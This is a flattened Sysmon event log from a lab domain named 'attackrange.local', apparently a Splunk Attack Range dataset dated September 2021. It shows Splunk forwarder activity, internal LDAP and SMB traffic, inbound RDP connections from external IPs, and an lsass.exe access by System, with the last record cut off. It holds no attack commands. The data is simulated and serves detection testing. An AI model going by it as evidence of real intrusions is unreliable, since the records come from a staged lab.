AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000977145Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:52.020{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-64685-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977148Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:57.516{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5802EA2B9A9688875D5EC599DA82D3E,SHA256=F26714FB9554BC80123F15DCB123B1744A5D036F6C141FC83BFCBC77CABA4742,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048546Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:55.057{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-64244-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048545Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:57.090{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CDC5A8F5DAD60D16DE022F98EE2D94DF,SHA256=41C3E4E6D13820BD8BC2139CD23168A72E750CC453D91DA5E514C8A6983CF8E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977147Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:53.739{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59287-false10.0.1.12-8000- 23542300x8000000000000000977149Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:58.532{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15B776DAA1DB654990A0B59DA7C821FD,SHA256=28A003604B9BE06622B70805B0EC79AED341FC8FCA12C689E4BE86F486FD91D1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048548Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:58.108{5EBD8912-7F2D-614D-0B00-00000000FC01}6242836C:\Windows\system32\lsass.exe{5EBD8912-7F11-614D-0100-00000000FC01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+2b3d4|C:\Windows\system32\lsasrv.dll+30929|C:\Windows\system32\lsasrv.dll+2e287|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+15ded|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001048547Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:58.055{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22EB90F302F792B68A1F3EC4D6FCA824,SHA256=9010ED5434C20FFFC1E1DCCD92BBE5A59881F1C10FA9A980D1676566FF1590C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977150Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:59.547{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB66B5AD44620B5D30E03321D633CE32,SHA256=F36D50638C3C4806360B105850EA78F255175432CE7123FE41358C68D70D5C85,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048557Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:57.803{5EBD8912-7F11-614D-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53244-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local445microsoft-ds 354300x80000000000000001048556Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:57.803{5EBD8912-7F11-614D-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53244-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local445microsoft-ds 354300x80000000000000001048555Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:57.690{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-429.attackrange.local53243-false10.0.1.14win-dc-429.attackrange.local389ldap 354300x80000000000000001048554Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:57.690{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53243-false10.0.1.14win-dc-429.attackrange.local389ldap 354300x80000000000000001048553Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:57.681{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53242-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001048552Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:57.681{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53242-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001048551Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:56.831{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53241-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048550Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:59.057{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2441E336E764FC4C04570FC122B519C9,SHA256=58D28464EAB7721B530A42AEA6FC8BEEC3C5772FB6E91FF045B5FFC4380812EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048549Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:59.010{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0886C92C9CE3104FCD7CFEBBD48A81C6,SHA256=429D2F8A74E07E7E078FB70D0C8B2F48E4D2BC2B98F69FED6230A5DC278E27E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977152Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:00.563{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F31A6D0D97E1B83A57701EA238FB4E7,SHA256=E5FCB23BBF1939335814B4130C4CFFB3090C40EE5081710911B4592DB9AFCE5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048558Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:00.072{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59514BF38FA9310E22647756146FC50B,SHA256=F98446777B9E70ED05950D1B2EFDA185D2B72E8EAB93271EC8CF04C6236D5E51,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977151Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:56.923{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-35328-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977153Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:01.563{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=465506350C77862B1705011B17AAB219,SHA256=694A0E65BE67329D44AC4F5E284460CBBEE9806A4AAA5603F71CC13FA2DFA4C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048559Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:01.140{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C06B9A1DD33C630661527D42487735A,SHA256=B3C32C561BDFDC0C55BF2DFC3F564C07CEC7A247BC02CF407A6464F0BD48AE34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977156Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:02.565{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C9CB009A79ECF3FE0181385E0205693,SHA256=00960D70F23C3FB7DBE19D49FFFBBBC3976B0155DA6DE5F2CB85F85078B304D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048560Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:02.172{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A4130556EBA0158013F909BE61F1BA7,SHA256=A885B68BC5A236EB441FDEEAAE5ED0406F0CF04FCBEB8CC774C9DB305244E6FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977155Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:02.000{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC865D85033AD9D67FF269EC16539E82,SHA256=154EB6410CC3DD3798E4E622B16EA79A0882602A73F7C2287E817C6DB70D5F17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977154Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:02.000{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=956B12BB5D4CF547110ADE107BFFD78A,SHA256=38607AC75B0CFC713C105A7CC7134329105015F21341304EF3A1307FEE45FE45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977159Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:03.581{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0FC69FF73BF43CA2BEFD08B6156B1E3,SHA256=15A1BA3C899A3A1A85CE47F00DE65D4DE61476299B74A689EF1B1B53B053EC31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048561Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:03.192{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64B50A1DBA3094BFFE48BBA0B0C68D92,SHA256=BD33D466FF0F5823FD31419D8F4D8F957EAE499FF47C87A3C96839FE9D866DC2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977158Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:00.039{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-61845-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977157Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:59.708{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59288-false10.0.1.12-8000- 23542300x8000000000000000977162Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:04.597{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA7C0A4EB93C67797A4F1C33929AC9D0,SHA256=9EFEEA199082DCF43BE64A7DAEDFB9D93AB3C0C6B2624F6DA735A857830AE47B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048563Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:02.831{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53245-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048562Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:04.207{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60FBB8987F7E9DA1FB18FFF319EC5899,SHA256=AA3C30B66E4E859CA4484FB9CD418BDC13FCB8B204CF6A5DA2660E585D3A2E59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977161Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:04.143{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC865D85033AD9D67FF269EC16539E82,SHA256=154EB6410CC3DD3798E4E622B16EA79A0882602A73F7C2287E817C6DB70D5F17,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977160Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:01.453{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-55003-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977163Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:05.597{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10F37E430243A3435D621B0C27C9E5BD,SHA256=37BD3445099E30EB2A7BB3DFF31E5AE41DED31E0E145213153AE341598B473DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048564Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:05.238{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25F7B7EEB6BF6980EBAB441BBCE411D8,SHA256=8140E0D1B06C0BF6B4701A3F92761658DF9036C0C78F7D2849B5B5E3633B0686,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977166Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:06.862{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=48FBF061C0A7A2BF86216EADDB43E3E3,SHA256=CC7E91711C3B5B767F297CBBB58A181985A5EA6CFF909BC80FD9D716D3C681B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977165Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:06.612{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B0FB31F3575E2D497F8DBB4C5CFE1F3,SHA256=F6BA44B86E04E2C6C56519A4AB6D55EE975ADCA0CB38A80E76AF00B5EFB82130,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048567Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:06.392{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=384641D93BCC5C25F036C4555AFBFB0D,SHA256=B63E2670778CEE0EFC3A585C6BCEA0A9F2BC496A189DA35B1B0E6B48BA7D3DC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048566Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:06.391{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=12657D365DDDEB871C2FA8D8C64EAAE8,SHA256=60D8081F4A8D577684B42CB22182C8A070D158898838226667266434463C798D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048565Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:06.239{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E58286A3C64015A7DD8469B8632A9B5A,SHA256=4954FCB5782CECC3C887D2667A1E2525E62080C534ED6611745C2D6D3B22D1F7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977164Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:02.059{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-23618-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977168Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:07.628{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=812E9180160E0E0F6150616E1477292A,SHA256=C77CF7D9BC0ADD714C2D40D60FCF7FBA633241409EBA8B8CF1C5B8BAFDF2D9AA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048569Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:04.681{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55396-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048568Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:07.249{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8081949DB8049F8345E1A1CFB0A6F83A,SHA256=A2ED5AEC0A0E9B775254F34B4BAE1D34F274E5064AB25F7C61A3B23A060074BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977167Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:04.819{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59289-false10.0.1.12-8000- 23542300x8000000000000000977169Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:08.628{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A6EFCB1454D441748D640D1D8C2E3E5,SHA256=1EC161CD6C5757D5C920B8801F9F602C5D24A240543174869217F4C8ACB1FF42,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048571Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:08.917{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048570Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:08.264{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1F62768872D9A5955CB8C151B7CCE38,SHA256=2EAAC1D2A4BE9B23BA3ADC0A1199690201446ECAA66987985E7CF343F155C255,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977170Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:09.643{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9CD2F0ED29899B410E92998899CB43A,SHA256=413D1F902AF043FE8C672E63C6FE60BB8CAC18CAC99CF57FCD9E8906DD5BCABB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048574Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:09.864{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=384641D93BCC5C25F036C4555AFBFB0D,SHA256=B63E2670778CEE0EFC3A585C6BCEA0A9F2BC496A189DA35B1B0E6B48BA7D3DC2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048573Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:07.840{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 